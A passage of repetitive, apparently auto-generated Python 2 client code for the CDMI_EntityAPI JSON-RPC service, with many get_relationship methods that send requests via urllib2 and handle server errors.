ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasResultsIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasResultsIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasResultsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasResultsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasSection(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasSection',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSectionOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSectionOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasStep(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasStep',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsStepOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsStepOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasTrait(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasTrait',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Measures(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Measures',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasUnits(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasUnits',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsLocated(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsLocated',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasUsage(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasUsage',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsUsageOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsUsageOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasValueFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasValueFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasValueIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasValueIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasVariationIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasVariationIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsVariedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsVariedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Impacts(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Impacts',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsImpactedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsImpactedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ImplementsReaction(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ImplementsReaction',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ImplementedBasedOn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ImplementedBasedOn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Includes(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Includes',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsIncludedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsIncludedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesAdditionalCompounds(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesAdditionalCompounds',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesAlignmentRow(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesAlignmentRow',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAlignmentRowIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAlignmentRowIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IncludesPart(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IncludesPart',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsPartOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsPartOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IndicatedLevelsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IndicatedLevelsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasLevelsFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasLevelsFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Involves(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Involves',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInvolvedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInvolvedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAnnotatedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAnnotatedBy',
'params': [ids, from_fields, rel_fields, to_fields],
